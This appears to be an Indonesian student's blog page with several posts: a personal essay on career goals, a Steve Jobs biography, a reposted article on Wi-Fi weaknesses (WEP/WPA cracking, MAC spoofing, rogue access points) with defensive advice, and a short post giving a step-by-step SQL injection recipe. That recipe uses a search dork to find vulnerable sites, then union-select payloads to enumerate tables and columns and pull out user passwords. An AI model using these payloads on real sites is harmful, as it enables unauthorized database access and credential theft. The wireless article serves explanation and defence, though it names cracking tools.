Sabtu, 25 Juni 2011

Cita-Cita dan Usaha

Hey para pembaca setia blog gw,kali ini setelah sekian lama gw ga menulis untuk blog gw,di karenakan gw akhir2 ini lagi sibuk sama hal2 ga jelas dan ga tau arahnya,sekarang gw membuat tulisan yang di khusus kan untuk tugas kampus,sekarang gw akan memberi judul Cita-cita dan usaha untuk tulisan ini,karena ini adalah tentang bagaimana tingkatan2 setiap tahun menjalani kehidupan ini untuk mengejar cita-cita gw,ga usah pake basa basi lagi langsung aja nih gw mulai cerita.
Pada awalnya bahkan sebelum gw tau arti dari cita2 gw ketika sudah besar bercita2 ingin menjadi seorang arsitektur , hal ini di karenakan gw termotivasi oleh ayah saya tercinta yang beliau pun seorang arsitektur,pada awalnya saya pun meliha2 kerja dari seorang arsitektur itu kelihatannya mudah,hanya menggambar,desain dan berinteraksi kepada orang2.
Tetapi sekarang ini cita2 saya menjadi seorang arsitektur pun seolah2 hilang,di karenakan factor utama saya,adalah tidak jago menggambar dan juga tidak lulus PTN yang pada waktu itu saya mencoba untuk mengambil jurusan arsitektur/teknik sipil,tetapi kegagalan saya ini menjadi acuan hidup saya untuk lebih berfikir tentang bagaimana caranya agar muncul kembali cita2 saya kedepan yang akan mencerah kan kehidupan saya,saya mencoba berfikir kembali kebelakang,apasih yang kiranya saya tuh expert/sudah lebih dari teman2 saya,setelah flash back saya pun mengingat bahwa saya sudah mengeti computer sejak saya kecil,karena ayah saya bekerja menggunakan computer,setelah arsitektur pun hilang dari benak saya,saya pun bergegas berfikir cepat,apa saya harus mengambil jurusan computer?
Jawab saya dalam hati,iya iya dan kamu harus berani mengambil keputusan sekarang,setelah saya tidak lulus PTN saya mencoba mencari perguruan tinggi swasta yang rating nya bagus dalam jurusan computer , setelah saya mencari2 dan sayapun mendapat kan beasiswa karena ikut try out,saya akhirnya mengambil universitas gunadarma yang komputernya pun cukup bagus menurut saya.
Setelah saya memasuki kampus saya,saya kemudian bertemu dengan teman2 yang hebat dan banyak yang lebih dari saya dalam bidang computer,sebenarnya saya malah tertantang karena saya bisa berkompetisi dengan teman2 saya yang ada pada lingkungan kelas dalam 1 kampus.
Pada awal kompetensi perkuliahan,saya kurang expert dalam bidang materi pembelajaran,namun saya tetap berusaha dan berusaha….biar  semuanya ga penasaran gw bikin grafik aja ya….hehe

Disini saya menerangkan nya dengan metode grafik yang akan saya jelaskan sepagai berikut
Titik pertama awal perkuliahan :
Saya pada awal perkuliahan sangat kurang expert dalam materi pembelajaran dikarenakan banyak mata kuliah yang baru saya pelajari jadi saya merasa kurang dari normal/
Titik kedua awal perkuliahan :
Disini tahap demi tahap pun saya lakukan yang pada akhirnya sedikit demi sedikit pun saya memahaminya dan saya merasa di atas normal.
Titik ketiga tahun 2010 :
Disini saya mulai mempelajari teknik2 komputer saya yang pada saat ini saya pun saya masih belajar,tetapi di titik ini saya sudah mengalami beberapa perubahan yang cukup signifikan.
Titik ke empat tahun 2010 :
Setelah saya mempelajarinya maka saya mempraktekannya,bahwa sanya saya sempat speechless bahwa jurusan yang saya ambil ini menarik dan cukup luas.
Titik ke 5 tahun 2010 :
Saya pun sering mengadakan research2 sendiri di kamar kost saya yang menghasil kan beberapa program yang cukup menari untuk para pemula seperti saya ini.
Titk 6 Sekarang :
Sekarang saya merasa sudah banyak mengetahui seluk beluk dunia cyber terutama tentang security dan jaringan,saya pun merasa seperti ini bukan karena saya sendiri,tetapi karena teman2 saya di beberapa komunitas yang saya ikuti,saya cukup mengetahui berbagai sistem operasi yang ada di dalam komputer.
Titik 7 sekarang :
Dititik sekarang ini saya sedang mengarah kan tentang bagaimana cara saya untuk menghasil kan suatu materi hidup sekedar untuk mencari pengalaman,saya disini memulai usaha marketing dalam bidang komputer,saya menyediakan jasa pembuatan website,dan juga,analisis security serta troubleshooting komputer.tampaknya saya sudah mulai ngantuk nihh,sekian curhatan saya semoga para pembaca pun termotivasi dengan tulisan saya ini..terima kasih…cheers

Jumat, 17 Juni 2011

SQLi

 
*Step By Step Sql injection
- inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"

- order by 1-- sampai ketemu eror

- union all select N --
N= sampai erorr ke breapa dari hasil order by td

(kalo udah ketemu angka itu vuln)

- union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16--

- vulin ada di nomor 4 version buat liat versi mysql

- union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where table_schema=database()--

- tambahin +from+information_schema.tables+where+table_schema=database()-- version ganti group concat

- union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns+where+table_name=0x6c6f67696e--


ganti nama tabel pake hexa

http://cyber4rt.com/~converter

dapet deh user paswdnya

->
Kunjungi Link dibawah ini…
http://opensource.telkomspeedy.com/wiki/index.php/SQL_Injection_Web_dengan_Dork

Keamanan Wireless LAN / WIFI

Keamanan  Wireless  LAN/Wifi


Jaringan  Wifi  memiliki  lebih  banyak  kelemahan  dibanding  dengan  jaringan  kabel.  Saat  ini  perkembangan
teknologi  wifi  sangat  signifikan  sejalan  dengan  kebutuhan  sistem  informasi  yang  mobile.  Banyak
penyedia  jasa  wireless  seperti  hotspot  komersil,  ISP,  Warnet,  kampus­kampus  maupun  perkantoran  sudah
mulai  memanfaatkan  wifi  pada  jaringan  masing  masing,  tetapi  sangat  sedikit  yang  memperhatikan
keamanan  komunikasi  data  pada  jaringan  wireless  tersebut.  Hal  ini  membuat  para  hacker  menjadi  tertarik
untuk   mengexplore   keamampuannya   untuk   melakukan   berbagai   aktifitas   yang   biasanya   ilegal
menggunakan  wifi.
Pada  artikel  ini  akan  dibahas  berbagai  jenis  aktivitas  dan  metode  yang  dilakukan  para  hacker  wireless
ataupun  para  pemula  dalam  melakukan  wardriving.  Wardriving  adalah  kegiatan  atau  aktivitas  untuk
mendapatkan  informasi  tentang  suatu  jaringan  wifi  dan  mendapatkan  akses  terhadap  jaringan  wireless
tersebut.  Umumnya  bertujuan  untuk  mendapatkan  koneksi  internet,  tetapi  banyak  juga  yang  melakukan
untuk  maksud­maksud  tertentu  mulai  dari  rasa  keingintahuan,  coba  coba,  research,  tugas  praktikum,
kejahatan  dan  lain  lain.
Kelemahan  jaringan  wireless  secara  umum  dapat  dibagi  menjadi  2  jenis,  yakni  kelemahan  pada konfigurasi  dan  kelemahan  pada  jenis  enkripsi  yang  digunakan.  Salah  satu  contoh  penyebab  kelemahan pada  konfigurasi  karena  saat  ini  untuk  membangun  sebuah  jaringan  wireless  cukup  mudah.  Banyak vendor  yang  menyediakan  fasilitas  yang  memudahkan  pengguna  atau  admin  jaringan  sehingga  sering ditemukan  wireless  yang  masih  menggunakan  konfigurasi  wireless  default  bawaan  vendor.  Penulis  sering menemukan  wireless  yang  dipasang  pada  jaringan  masih  menggunakan  setting  default  bawaan  vendor seperti  SSID,  IP  Address  ,  remote  manajemen,  DHCP  enable,  kanal  frekuensi,  tanpa  enkripsi  bahkan user/password  untuk  administrasi  wireless  tersebut.
WEP  (Wired  Equivalent  Privacy)  yang  menjadi  standart  keamanan  wireless  sebelumnya,  saat  ini  dapat dengan  mudah  dipecahkan  dengan  berbagai  tools  yang  tersedia  gratis  di  internet.  WPA­PSK  dan  LEAP yang  dianggap  menjadi  solusi  menggantikan  WEP,  saat  ini  juga  sudah  dapat  dipecahkan  dengan  metode dictionary  attack  secara  offline.
Kelemahan  Wireless  pada  Lapisan  Fisik
Wifi  menggunakan  gelombang  radio  pada  frekwensi  milik  umum  yang  bersifat  bebas  digunakan  oleh semua  kalangan  dengan  batasan  batasan  tertentu.  Setiap  wifi  memiliki  area  jangkauan  tertentu  tergantung power  dan  antenna  yang  digunakan.  Tidak  mudah  melakukan  pembatasan  area  yang  dijangkau  pada  wifi. Hal  ini  menyebabkan  berbagai  dimungkinan  terjadi  aktifitas  aktifitas  antara  lain:
-   Interception  atau  penyadapan
Hal  ini  sangat  mudah  dilakukan,  dan  sudah  tidak  asing  lagi  bagi  para  hacker.  Berbagai  tools  dengan
mudah  di  peroleh  di  internet.  Berbagai  teknik  kriptografi  dapat  di  bongkar  oleh  tools  tools  tersebut.

-   Injection
Pada  saat  transmisi  melalui  radio,  dimungkinkan  dilakukan  injection  karena  berbagai  kelemahan  pada cara  kerja  wifi  dimana  tidak  ada  proses  validasi  siapa  yang  sedang  terhubung  atau  siapa  yang memutuskan  koneksi  saat  itu.
-   Jamming
Jamming  sangat  dimungkinkan  terjadi,  baik  disengaja  maupun  tidak  disengaja  karena  ketidaktahuan
pengguna  wireless  tersebut.  Pengaturan  penggunaan  kanal  frekwensi  merupakan  keharusan  agar
jamming  dapat  di  minimalisir.  Jamming  terjadi  karena  frekwensi  yang  digunakan  cukup  sempit
sehingga  penggunaan  kembali  channel  sulit  dilakukan  pada area  yang  padat  jaringan  nirkabelnya.  S
-   Locating  Mobile  Nodes
Dengan  berbagai  software,  setiap  orang  mampu  melakukan  wireless  site  survey  dan  mendapatkan
informasi  posisi  letak  setiap  Wifi  dan  beragam  konfigurasi  masing  masing.  Hal  ini  dapat  dilakukan
dengan  peralatan  sederhana spt  PDA  atau  laptop  dengan  di  dukung  GPS  sebagai  penanda  posisi.
-   Access  Control
Dalam  membangun  jaringan  wireless  perlu  di  design  agar  dapat  memisahkan  node  atau  host  yang
dapat  dipercaya  dan  host  yang  tidak  dapat  dipercaya.  Sehingga  diperlukan  access  control  yang  baik
-   Hijacking
Serangan  MITM  (Man  In  The  Middle)  yang  dapat  terjadi  pada  wireless  karena  berbagai  kelemahan protokol  tersebut  sehingga  memungkinkan  terjadinya  hijacking  atau  pengambilalihan  komunikasi yang  sedang  terjadi  dan  melakukan  pencurian  atau  modifikasi  informasi.

Kelemahan  pada  Lapisan  MAC  (Data  Layer)
Pada  lapisan  ini  terdapat  kelemahan  yakni  jika  sudah  terlalu  banyak  node  (client)  yang  menggunakan  channel  yang
sama  dan  terhubung  pada  AP  yang  sama,  maka  bandwidth  yang  mampu  dilewatkan  akan  menurun.  Selain  itu  MAC
address  sangat  mudah  di  spoofing  (ditiru  atau  di  duplikasi)  membuat  banyak  permasalahan  keamanan.  Lapisan  data
atau  MAC   juga  digunakan  dalam  otentikasi  dalam  implementasi  keamanan  wifi  berbasis  WPA  Radius  (802.1x  plus
TKIP/AES).

Beberapa  Teknik  Keamanan  yang  digunakan  pada  Wireless  LAN Dibawah  ini  beberapa kegiatan  dan  aktifitas  yang  dilakukan  untuk  mengamanan  jaringan  wireless  :
Menyembunyikan  SSID
Banyak  administrator  menyembunyikan  Services  Set  Id  (SSID)  jaringan  wireless  mereka  dengan  maksud agar  hanya  yang  mengetahui  SSID  yang  dapat  terhubung  ke  jaringan  mereka.  Hal  ini  tidaklah  benar, karena  SSID  sebenarnya  tidak  dapat  disembuyikan  secara  sempurna.  Pada  saat  saat  tertentu  atau khususnya  saat  client  akan  terhubung  (assosiate)  atau  ketika  akan  memutuskan  diri  (deauthentication) dari  sebuah  jaringan  wireless,  maka  client  akan  tetap  mengirimkan  SSID  dalam  bentuk  plain  text (meskipun  menggunakan  enkripsi),  sehingga  jika  kita  bermaksud  menyadapnya,  dapat  dengan  mudah menemukan  informasi  tersebut.  Beberapa  tools  yang  dapat  digunakan  untuk  mendapatkan  ssid  yang dihidden  antara  lain,  kismet  (kisMAC),  ssid_jack  (airjack),  aircrack  ,
void11  dan  masih  banyak  lagi.
Keamanan  wireless  hanya  dengan  kunci  WEP
WEP  merupakan  standart  keamanan  &  enkripsi  pertama  yang  digunakan  pada  wireless,  WEP  memiliki berbagai  kelemahan  antara  lain  :

●  Masalah  kunci  yang  lemah,  algoritma  RC4  yang  digunakan  dapat  dipecahkan. ●  WEP  menggunakan  kunci  yang  bersifat  statis
●  Masalah  initialization  vector  (IV)  WEP
●  Masalah  integritas  pesan  Cyclic  Redundancy  Check  (CRC­32)

WEP  terdiri  dari  dua  tingkatan,  yakni  kunci  64  bit,  dan  128  bit.  Sebenarnya  kunci  rahasia  pada  kunci
WEP  64  bit  hanya  40  bit,  sedang  24bit  merupakan  Inisialisasi  Vektor  (IV).  Demikian  juga  pada  kunci
WEP  128  bit,  kunci  rahasia terdiri  dari  104bit.  Serangan­serangan  pada  kelemahan  WEP  antara  lain  :
1.  Serangan  terhadap  kelemahan  inisialisasi  vektor  (IV),  sering  disebut  FMS  attack.  FMS  singkatan
            dari  nama  ketiga  penemu  kelemahan  IV  yakni  Fluhrer,  Mantin,  dan  Shamir.  Serangan  ini
            dilakukan  dengan  cara  mengumpulkan  IV  yang  lemah  sebanyak­banyaknya. 
2.  Mendapatkan  IV  yang  unik  melalui  packet  data  yang  diperoleh  untuk  diolah  untuk  proses
            cracking  kunci  WEP  dengan  lebih  cepat.  Cara  ini  disebut  chopping  attack,  pertama  kali
            ditemukan  oleh  h1kari.  Teknik  ini  hanya  membutuhkan  IV  yang  unik  sehingga  mengurangi
            kebutuhan  IV  yang  lemah  dalam  melakukan  cracking  WEP.
3.  Kedua  serangan  diatas  membutuhkan  waktu  dan  packet  yang  cukup,  untuk  mempersingkat  waktu,
            para  hacker  biasanya  melakukan  traffic  injection.  Traffic  Injection  yang  sering  dilakukan  adalah
            dengan  cara  mengumpulkan  packet  ARP  kemudian  mengirimkan  kembali  ke  access  point.  Hal  ini
            mengakibatkan  pengumpulan  initial  vektor  lebih  mudah  dan  cepat.  Berbeda  dengan  serangan
            pertama  dan  kedua,  untuk  serangan  traffic  injection,diperlukan  spesifikasi  alat  dan  aplikasi
            tertentu  yang  mulai  jarang  ditemui  di  toko­toko,  mulai  dari  chipset,  versi  firmware,  dan  versi
            driver  serta  tidak  jarang  harus  melakukan  patching  terhadap  driver  dan  aplikasinya.
MAC  Filtering
Hampir  setiap  wireless  access  point  maupun  router  difasilitasi  dengan  keamanan  MAC  Filtering.  Hal  ini sebenarnya  tidak  banyak  membantu  dalam  mengamankan  komunikasi  wireless,  karena  MAC  address sangat  mudah  dispoofing  atau  bahkan  dirubah.  Tools  ifconfig  pada  OS  Linux/Unix  atau  beragam  tools  spt network  utilitis,  regedit,  smac,  machange  pada  OS  windows  dengan  mudah  digunakan  untuk  spoofing atau  mengganti  MAC  address.
Penulis  masih  sering  menemukan  wifi  di  perkantoran  dan  bahkan  ISP  (yang  biasanya  digunakan  oleh
warnet­warnet)  yang  hanya  menggunakan  proteksi  MAC  Filtering.  Dengan  menggunakan  aplikasi
wardriving  seperti  kismet/kisMAC  atau  aircrack  tools,  dapat  diperoleh  informasi  MAC  address  tiap  client
yang  sedang  terhubung  ke  sebuah  Access  Point.  Setelah  mendapatkan  informasi  tersebut,  kita  dapat
terhubung  ke  Access  point  dengan  mengubah  MAC  sesuai  dengan  client  tadi.  Pada  jaringan  wireless,
duplikasi  MAC  adress  tidak  mengakibatkan  konflik.  Hanya  membutuhkan  IP  yang  berbeda  dengan  client
yang  tadi.
Captive  Portal
Infrastruktur  Captive  Portal  awalnya  didesign  untuk  keperluan  komunitas  yang  memungkinkan  semua
orang  dapat  terhubung  (open  network).  Captive  portal  sebenarnya  merupakan  mesin  router  atau  gateway
yang  memproteksi  atau  tidak  mengizinkan  adanya  trafik  hingga  user  melakukan  registrasi/otentikasi

Berikut  cara  kerja  captive  portal  :
●  user  dengan  wireless  client  diizinkan  untuk  terhubung  wireless  untuk  mendapatkan  IP  address
            (DHCP)
●  block  semua  trafik  kecuali  yang  menuju  ke  captive  portal  (Registrasi/Otentikasi  berbasis  web)  yang
            terletak  pada  jaringan  kabel.
●  redirect  atau  belokkan  semua  trafik  web  ke  captive  portal
●  setelah  user  melakukan  registrasi  atau  login,  izinkan  atau  buka  akses  ke  jaringan  (internet)

Beberapa  hal  yang  perlu  diperhatikan,  bahwa  captive  portal  hanya  melakukan  tracking  koneksi  client
berdasarkan  IP  dan  MAC    address  setelah  melakukan  otentikasi.  Hal  ini  membuat  captive  portal  masih
dimungkinkan  digunakan  tanpa  otentikasi  karena  IP  dan  MAC  adress  dapat  dispoofing.  Serangan  dengan
melakukan  spoofing  IP  dan  MAC.  Spoofing  MAC  adress  seperti  yang  sudah  dijelaskan  pada  bagian  Mac
Filtering  diatas.  Sedang  untuk  spoofing  IP,  diperlukan  usaha  yang  lebih  yakni  dengan  memanfaatkan
ARP  cache  poisoning,  kita  dapat  melakukan  redirect  trafik  dari  client  yang  sudah  terhubung  sebelumnya.
Serangan  lain  yang  cukup  mudah  dilakukan  adalah  menggunakan  Rogue  AP,  yaitu  mensetup  Access
Point  (biasanya  menggunakan  HostAP)  yang  menggunakan  komponen  informasi  yang  sama  seperti  AP
target  seperti  SSID,  BSSID  hingga  kanal  frekwensi  yang  digunakan.  Sehingga  ketika  ada  client  yang  akan
terhubung  ke  AP  buatan  kita,  dapat  kita  membelokkan  trafik  ke  AP  sebenarnya.  Tidak  jarang  captive
portal  yang  dibangun  pada  suatu  hotspot  memiliki  kelemahan  pada  konfigurasi  atau  design  jaringannya.
Misalnya,  otentikasi  masih  menggunakan  plain  text  (http),  managemen  jaringan  dapat  diakses  melalui
wireless  (berada  pada  satu  network),  dan  masih  banyak  lagi.
Kelemahan  lain  dari  captive  portal  adalah  bahwa  komunikasi  data  atau  trafik  ketika  sudah  melakukan
otentikasi  (terhubung  jaringan)  akan  dikirimkan  masih  belum  terenkripsi,  sehingga  dengan  mudah  dapat
disadap  oleh  para  hacker.  Untuk  itu  perlu  berhati­hati  melakukan  koneksi  pada  jaringan  hotspot,  agar
mengusahakan  menggunakan  komunikasi  protokol  yang  aman  seperti  https,pop3s,  ssh, imaps  dst.

Keamanan  wireless  hanya  dengan  kunci  WPA­PSK  atau  WPA2­PSK
WPA  merupakan  teknologi  keamanan  sementara  yang  diciptakan  untuk  menggantikan  kunci  WEP.  Ada
dua  jenis  yakni  WPA  personal  (WPA­PSK),  dan  WPA­RADIUS.  Saat  ini  yang  sudah  dapat  di  crack
adalah  WPA­PSK,   yakni   dengan   metode   brute   force  attack   secara  offline.  Brute   force  dengan
menggunakan  mencoba­coba  banyak  kata  dari  suatu  kamus.  Serangan  ini  akan  berhasil  jika  passphrase
yang  yang  digunakan  wireless  tersebut  memang  terapat  pada  kamus  kata  yang  digunakan  si  hacker.  Untuk
mencegah   adanya   serangan   terhadap   keamanan   wireless   menggunakan   WPA­PSK,   gunakanlah
passphrase  yang  cukup  panjang  (misal  satu  kalimat).  Tools  yang  sangat  terkenal  digunakan  melakukan
serangan  ini  adalah  CoWPAtty  (http://www.churchofwifi.org/  )  dan  aircrack  (http://www.aircrack­ng.org).
Tools  ini  memerlukan  daftar  kata  atau  wordlist,  dapat  di  ambil  dari  http://wordlist.sourceforge.net/ 

Referensi :
-dari berbagai sumber di internet dan
-Seminar  Wireless  dan  Keamanan  Wireless  pada   Sabtu,  7  April  2007  UNY,  Yogyakarta
by  Josua  M  Sinambela  < josh  at  gadjahmada.edu  >







Rabu, 15 Juni 2011

Biografi Steve Jobs,Produk Apple,Kisah Steve Jobs yang di "Komik"an

Biografi Steve Jobs - Pendiri Apple Computer


Steven Paul Jobs (lahir di San Francisco, California, Amerika Serikat, 24 Februari 1955; umur 54 tahun) adalah pemimpin perusahaan Apple Computer bersama Steve Wozniak dan tokoh utama di industri komputer. Sebagai pendiri (dengan Steve Wozniak) Apple Computer di tahun 1976, ia mempopulerkan konsep komputer di rumah tangga dengan Apple II. Kemudian, ia merupakan salah satu orang yang pertama kali menyadari potensi untuk mengomersialkan antarmuka pengguna grafis (graphical user interface) dan mouse yang dikembangkan di Palo Alto Research Center perusahaan Xerox, dan kemudian teknologi ini diterapkannya ke dalam Apple Macintosh.Jobs juga memimpin Pixar Animation Studios, sebuah perusahaan komputer animasi terkemuka di dunia layar lebar. telah menjadi multi-jutawan sebelum berumur 30 tahun. Dimulai dengan perusahaan NeXT untuk membuat sistem pendidikan dengan harga yang terjangkau, menemukan bahwa menjual software lebih baik dari pada menjual hardware.Dilahirkan di San Fransisco oleh ibunya Joanne Simpson dan ayahnya Abdulfattah Jandali mahasiswa tamu dari Syria yang kemudian menjadi profesor ilmu politik. Sejak bayi beliau diadopsi Paul dan Clara Jobs dari Mountain View,Santa Clara County California. Orang tua angkat inilah yang memberikan nama Steven Jobs. Orang tua biologisnya kelak menikah dan memberinya adik perempuan bernama Mona Simpson yang kini terkenal sebagai novelis.Beliau melewati masa SMP dan SMU di Curpetino, Califonia, seringkali setelah jam sekolah mengajar di Hewlett Packard Company di Palo Alto, California. Maka tak heran segera setelah itu ia dan Steve Wozniak segera menjadi pekerja paruh waktu di perusahaan ini. Di tahun 1972, Jobs lulus dari SMA Homestead di Cupertino, California dan diterima di Reed College di Portland, Oregon, tapi dikeluarkan/ drop out setelah satu semester. Tapi ia segera mendaftar ke Reed College, salah satu hal yang dipelajari di sini kaligrafi. "Jika saya tak pernah dikeluarkan dari tempat belajar hanya satu semester mungkin Mac saat ini tak akan memiliki multiple typefaces atau font-font yang proposional," katanya.Di musim gugur tahun 1974, Jobs kembali ke California dan mulai menghadiri pertemuan "Homebrew Computer Club" dengan Steve Wozniak. Dia dan Wozniak bersama bekerja di Atari Inc., sebuah perusahaan pembuat permainan komputer yang terkenal, dengan jabatan sebagai perancang permainannya. Motivasinya saat itu adalah mengumpulkan uang untuk melakukan perjalanan spiritual ke India.Jobs kemudian melakukan perjalanan pencerahan spritual ke India bersama temannya di Reed College, Daniel Kottke, yang kemudian hari menjadi pegawai Apple yang pertama. Kembali dari India dia menjadi Buddhist dengan rambut dicukur/gundul dan mengenakan pakaian tradisional India (biksu?). Selama masa ini ia mempraktekkan psychedelics (semacam meditasi, saat itu Jobs sering dianggap aneh, karena berjalan telanjang kaki di atas Salju- ini semacam meditasi kesadaran). Ini adalah dua atau tiga hal yang paling penting dalam hidup yang pernah ia lakukan dalam hidupnya.Di tahun 1976, Jobs, usia 21, dan Wozniak, 26, mendirikan Apple Computer Co. di garasi milik keluarga Jobs. Komputer pribadi yang diperkenalkan Jobs and Wozniak diberi name Apple I. Komputer itu dijual dengan harga AS$666.66, sebagai referensi terhadap nomor telpon dari Wozniak's Dial-A-Joke machine, yang berakhir dengan -6666.Di tahun 1977, Jobs dan Wozniak memperkenalkan Apple II, yang menjadi sukses besar di pasaran rumah tangga dan memberi Apple pengaruh besar di industri komputer pribadi yang masih muda. Di tahun 1980, Apple Computer mencatatkan namanya di bursa efek, dan dengan penawaran saham awal yang sukses, ketenaran Jobs bertambah. Tahun itu juga, Apple Computer melepas Apple III, walaupun kesuksesannya tidak sebaik sebelumnya.Seiring dengan berkembangnya Apple Computer, perusahaan itu mulai mencari kepemimpinan baru untuk membantu mengatur perkembangan perusahaan tersebut. Di tahun 1983, Jobs menggaet John Sculley, dari perusahaan Pepsi-Cola, untuk memimpin Apple Computer, dengan tantangan, "Apakah kamu mau menjual minuman berkarbon seumur hidupmu, atau maukah kamu mengubah dunia?" (Do you want to just sell sugared water for the rest of your life, or do you want to change the world?) Tahun itu juga, Apple juga mengeluarkan Apple Lisa yang teknologinya tergolong sangat maju pada saat itu tapi gagal meraih pembeli di pangsa pasar.Tahun 1984 menjadi tahun pengenalan Macintosh, komputer pertama yang berhasil dijual ke pasaran dengan menghadirkan fitur antarmuka pengguna grafis. Pengembangan Mac dicetuskan oleh Jef Raskin dan tim tersebut menggunakan teknologi yang sudah dikembangkan bukan oleh Apple, seperti di Xerox's PARC, tetapi belum sempat dikomersialkan. Kesuksesan Macintosh membuat Apple menelantarkan Apple II demi mengembangkan produksi Mac, yang bertahan sampai saat ini.Walaupun Jobs sangat persuasif dan karismatik bagi Apple, Banyak yang menganggap dia sebagai pemimpin yang gampang berubah pikiran dan beremosi tinggi. Di tahun 1985, setelah banyak menyebabkan masalah kepemimpinan di dalam Apple, Sculley memberhentikan Jobs dari jabatannya dan mengusirnya dari Apple.Setelah keluar dari Apple, Jobs mendirikan sebuah perusahaan komputer lagi, NeXT Computer yang seperti Lisa, NeXT tergolong sangat maju dalam hal teknologi, tetapi tidak pernah menjadi terkenal, kecuali di lingkup riset sains. (Tim Berners-Lee mengembangkan sistem World Wide Web di CERN dengan menggunakan sebuah NeXT workstation.) Namun NeXT membantu memajukan teknologi-teknologi sepert program object-oriented, PostScript, dan perangkat magneto-optical.Di tahun 1996, Apple membeli NeXT seharga AS$402 juta, dan membawa Jobs kembali ke perusahaan yang ia dirikan. Di tahun 1997 ia menjadi pemimpin sementara di Apple setelah kepergian Gil Amelio.Dengan pembelian NeXT, banyak teknologi dari NeXT diterapkan ke dalam produk buatan Apple, terutama NeXTSTEP, yang berkembang menjadi Mac OS X. Dibawah bimbingan Jobs perusahaan tersebut meningkatkan penjualannya setelah memperkenalkan iMac.

 iMac merupakan komputer pertama yang dijual dengan mengutamakan penampilannya (walaupun iMac juga banyak menggunakan teknologi maju di dalamnya). Sejak saat itu, penampilan yang menarik dan merek yang terkenal telah memberikan keuntungan bagi Apple.Belakangan ini, Apple mulai mengembangkan sayapnya. Dengan pengenalan iPod alat musik portabel, piranti lunak iTunes, dan iTunes Music Store, perusahaan tersebut melakukan gebrakan di bidang peralatan elektronik pribadi dan musik online. Sambil merangsang inovasi, Jobs juga mengingatkan bawahannya bahwa, "artis tulen membuahkan hasil," (real artists ship) yang maksudnya adalah, menghasilkan karya-karya dengan tepat waktu sama pentingnya dengan inovasi dan produk jitu.Jobs bekerja di Apple selama beberapa tahun dengan gaji AS$1/tahun. Karenanya dia tercatat di buku Guinness World Records sebagai "pemimpin perusahaan dengan gaji terendah" (Lowest Paid Chief Executive Officer). Setelah Apple mulai meraih laba penjualan kembali, perusahaan tersebut melepaskan gelarnya sebagai pemimpin sementara. Saat ini penghasilannya di Apple adalah AS$219 juta, menurut sebuah artikel yang ditulis di situs Bloomberg di tahun 2003.jobs sangat dikagumi karena keahliannya untuk meyakinkan orang dan menjadi salesman unggul, yang sering dijuluki reality distortion field dan hal ini tampak nyata saat ia memberikan keynote speeches di Apple expos. Namun, kegigihannya juga pernah mengundang sial. Kekerasan kepalanya mungkin telah menyebabkan Apple kehilangan kesempatan emas untuk menjadi pemimpin di bidang komputer pribadi. Keenganannya untuk membiarkan perusahaan lain membuat komputer yang kompatible dengan Macintosh mengakibatkan Apple harus menelan kekalahan dalam merebut pengguna komputer yang ada. Perusahaan piranti keras dan lunak akhirnya memutuskan untuk mengadopsi platform IBM PC yang menggunakan sistem operasi buatan Microsoft. Microsoft kemudian juga mengejar ketinggalannya dari Apple dengan mengembangkan antarmuka pengguna grafis buatan mereka sendiri, Microsoft Windows.Di tahun 1986 Jobs mendirikan (bersama Edwin Catmull) Pixar, sebuah studio animasi komputer di Emeryville, California. Perusahaan itu didirikan dari apa yang dahulunya divisi grafik komputer milik Lucasfilm, yang Jobs beli dari pendirinya, George Lucas, sebesar AS$10 juta. Satu dekade kemudian, Pixar berkembang menjadi terkenal dan berhasil dengan film terobosannya Toy Story. Sejak saat itu Pixar sudah membuahkan film-film yang memenangkan Academy Award yaitu Finding Nemo dan The Incredibles. Karena kepemimpinannya di Pixar dan juga kemapanannya di Apple, Jobs dianggap oleh banyak pengamat industri hiburan salah satu calon pengganti Michael Eisner sebagai pemimpin dari The Walt Disney Company, yang mendistribusikan dan mendanai film-film buatan Pixar.
Kisah Sukses Steve Jobs Dibuat Komik:
Untuk pertama kalinya, kisah kehidupan pendiri dan CEO Apple Steve Jobs akan diangkat dalam bentuk komik. Adalah Bluewater Productions Inc yang akan menerbitkannya.
"Inovasinya selalu layak tampil di headline berita, spekulasi kesehatannya memengaruhi pasar modal. Menarik untuk seorang yag dropout kuliah," kata Darren Davis, Presiden Bluewater, Senin (13/6/2011).
Naskah komik tersebut ditulis oleh C W  Cooke dan digambar oleh Chris Schmidt. Isinya menceritakan sepak terjang Steve Jobs sejak mulai mendirikan Apple hingga membidani perangkat-perangkat inovatif, seperti iPod yang merevolusi industri musik, iPhone, dan iPad.
"Mau mengagumi dia atau benci dia, (yang pasti) visi Jobs dan ketajaman bisnisnya telah merevolusi dunia," kata Cooke. Kisah kehidupannya dirangkum dalam 32 halaman dan akan terbit pada 24 Agustus 2011.
Menurut dia, komik yang diberi judul Steve Jobs: Co-Founder of Apple ini merupakan bagian dari proyek yang dicanangkan penerbitan di Vancouver, Washington, tersebut. Sebelumnya, Bluewater sukses menerbitkan komik Mark Zuckerberg yang ludes terjual.
 

Produk apple dari masa ke masa :








Apple Macintosh pertama diperkenalkan oleh Ridley Scott televisi komersial, '1984.
Apple datang dibundel dengan dua aplikasi yang dirancang untuk memamerkan user interface : MacWrite dan MacPaint.
Pada tahun 1991, Apple meluncurkan PowerBook 100. Itu adalah komputer portabel pertama dengan keyboard di belakang sandaran tangan, dan sebuah trackball di depan keyboard.
Pada tahun 1993, Apple menciptakan MessagePad pertama, yang dikenal sebagai 'Newton. " Itu adalah salah satu asisten pribadi digital. Menggunakan baterai AAA dan memiliki buku alamat, kalender, catatan, dan dapat digunakan untuk faks dan email.

IMac, diluncurkan pada tahun 1998, adalah komputer Apple untuk milenium baru. Ini dirancang dengan internet dan dilengkapi 2 USB ports. Casing terbaru dibuat dengan plastik transparan.

Beebentuk kubus 8x8x8, Power Macintosh G4 Cube adalah produk yang terjun ke dalam pasar bisnis. Terdiri dari 450 MHz G4 processor, 20 GB hard drive, modem 56 kbps dan 64 MB RAM.
Diumumkan pada tahun 2001, iPod Apple pertama bersaing ke pasar musik digital. Desain yang lebih tipis, lebih ringan, dan versi yang lebih murah pada tahun 2004 dengan sebuah klik roda.
Diumumkan pada tahun 2007, Apple iPhone adalah ponsel pertama. Dengan layar sentuh dan pemutar MP3. Ini termasuk versi kustom Safari yang memungkinkan browsing penuh dari web dan terpadu akses ke YouTube dan Google Maps.

